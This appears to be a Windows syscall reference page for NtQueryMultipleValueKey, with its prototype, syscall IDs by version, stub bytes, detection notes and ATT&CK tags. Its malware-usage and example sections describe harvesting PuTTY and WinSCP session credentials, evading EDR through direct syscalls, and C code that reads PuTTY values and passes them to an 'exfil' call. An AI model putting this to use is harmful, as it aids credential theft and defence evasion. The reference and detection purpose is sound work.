ntoskrnl.exeT1552.002T1012T1106

NtQueryMultipleValueKey

Atomically reads several registry values from a single key in one syscall.

Prototype

NTSTATUS NtQueryMultipleValueKey(
  HANDLE              KeyHandle,
  PKEY_VALUE_ENTRY    ValueEntries,
  ULONG               EntryCount,
  PVOID               ValueBuffer,
  PULONG              BufferLength,
  PULONG              RequiredBufferLength
);

Arguments

Name	Type	Dir	Description
KeyHandle	HANDLE	in	Handle to an open registry key (must include KEY_QUERY_VALUE).
ValueEntries	PKEY_VALUE_ENTRY	in/out	Array of KEY_VALUE_ENTRY structs: caller fills ValueName, kernel fills Type/DataOffset/DataLength.
EntryCount	ULONG	in	Number of entries in the ValueEntries array.
ValueBuffer	PVOID	out	Single packed output buffer; each ValueEntry's DataOffset points into it.
BufferLength	PULONG	in/out	On input: size of ValueBuffer. On output: bytes actually used.
RequiredBufferLength	PULONG	out	Set on STATUS_BUFFER_OVERFLOW with the size the caller should retry with.

Syscall IDs by Windows version

Windows version	Syscall ID	Build
Win10 1507	0x13B	win10-1507
Win10 1607	0x141	win10-1607
Win10 1703	0x147	win10-1703
Win10 1709	0x14A	win10-1709
Win10 1803	0x14C	win10-1803
Win10 1809	0x14D	win10-1809
Win10 1903	0x14E	win10-1903
Win10 1909	0x14E	win10-1909
Win10 2004	0x154	win10-2004
Win10 20H2	0x154	win10-20h2
Win10 21H1	0x154	win10-21h1
Win10 21H2	0x155	win10-21h2
Win10 22H2	0x155	win10-22h2
Win11 21H2	0x15C	win11-21h2
Win11 22H2	0x15F	win11-22h2
Win11 23H2	0x15F	win11-23h2
Win11 24H2	0x161	win11-24h2
Server 2016	0x141	winserver-2016
Server 2019	0x14D	winserver-2019
Server 2022	0x15A	winserver-2022
Server 2025	0x161	winserver-2025

Kernel module

ntoskrnl.exe → NtQueryMultipleValueKey

Related APIs

RegQueryMultipleValuesWRegQueryValueExWNtQueryValueKeyNtEnumerateValueKeyNtOpenKeyZwQueryMultipleValueKey

Syscall stub

4C 8B D1            mov r10, rcx
B8 61 01 00 00      mov eax, 0x161     ; Win11 24H2 SSN
F6 04 25 08 03 FE 7F 01   test byte ptr [0x7FFE0308], 1
75 03               jne short +3
0F 05               syscall
C3                  ret
CD 2E               int 2Eh
C3                  ret

Undocumented notes

Backing syscall for `RegQueryMultipleValuesW`. The kernel walks the key's value list once, fetches all requested values into a single packed buffer under one hive lock, and returns offsets — strictly faster than N back-to-back `NtQueryValueKey` calls and, more importantly, *atomic* against concurrent writers. Each `KEY_VALUE_ENTRY` is `{ ValueName, DataLength, DataOffset, Type }`; the caller pre-populates `ValueName` (a `UNICODE_STRING*`), the kernel populates the other three.

Common malware usage

Credential harvesting and reconnaissance tools that target structured keys benefit from the atomicity. The textbook example is PuTTY saved sessions under `HKCU\Software\SimonTatham\PuTTY\Sessions\<name>` — `HostName`, `UserName`, `PortNumber`, `Protocol`, `PublicKeyFile` and `ProxyHost` can be pulled in a single call, ensuring the user can't rotate the session mid-read. WinSCP, FileZilla XML-via-INI fallbacks, and PowerShell ISE history paths in HKCU exhibit similar shapes. It is also a slightly less hooked path than `RegQueryValueExW`, which means it can be a marginal evasion win against EDRs that instrument advapi32 but not direct ntdll calls.

WinSCP/PuTTY session stealers (commodity infostealers)Various PoSh credential-grabber scripts

Detection opportunities

Volume of `NtQueryMultipleValueKey` calls is very low compared to `NtQueryValueKey`, which makes it relatively high-signal. ETW Microsoft-Windows-Kernel-Registry emits `EventID 4` (QueryValueKey) per *value* even for the multi-value path, so existing detections that key on access to `Software\SimonTatham\PuTTY` or `Software\Martin Prikryl` still fire. Sysmon Event 12/13 surface key opens against the credential paths. Process-correlation rules (`powershell.exe`/`rundll32.exe`/unsigned binary reading PuTTY sessions) carry the actual detection value.

Direct syscall examples

cPull a PuTTY session atomically

// HKCU\Software\SimonTatham\PuTTY\Sessions\<sessionName>
UNICODE_STRING n1, n2, n3, n4;
RtlInitUnicodeString(&n1, L"HostName");
RtlInitUnicodeString(&n2, L"UserName");
RtlInitUnicodeString(&n3, L"PortNumber");
RtlInitUnicodeString(&n4, L"PublicKeyFile");

KEY_VALUE_ENTRY entries[4] = {
    { &n1, 0, 0, 0 },
    { &n2, 0, 0, 0 },
    { &n3, 0, 0, 0 },
    { &n4, 0, 0, 0 },
};

UCHAR buf[2048];
ULONG bufLen = sizeof(buf), required = 0;
NTSTATUS st = NtQueryMultipleValueKey(hKey, entries, 4,
                                      buf, &bufLen, &required);
if (NT_SUCCESS(st)) {
    PWSTR host = (PWSTR)(buf + entries[0].DataOffset);
    PWSTR user = (PWSTR)(buf + entries[1].DataOffset);
    DWORD port = *(DWORD*)(buf + entries[2].DataOffset);
    PWSTR pkey = (PWSTR)(buf + entries[3].DataOffset);
    exfil(host, user, port, pkey);
}

asmx64 direct stub

; NtQueryMultipleValueKey direct syscall (Win11 24H2 SSN 0x161)
NtQueryMultipleValueKey PROC
    mov  r10, rcx
    mov  eax, 161h
    syscall
    ret
NtQueryMultipleValueKey ENDP

MITRE ATT&CK mappings

Last verified: 2026-05-20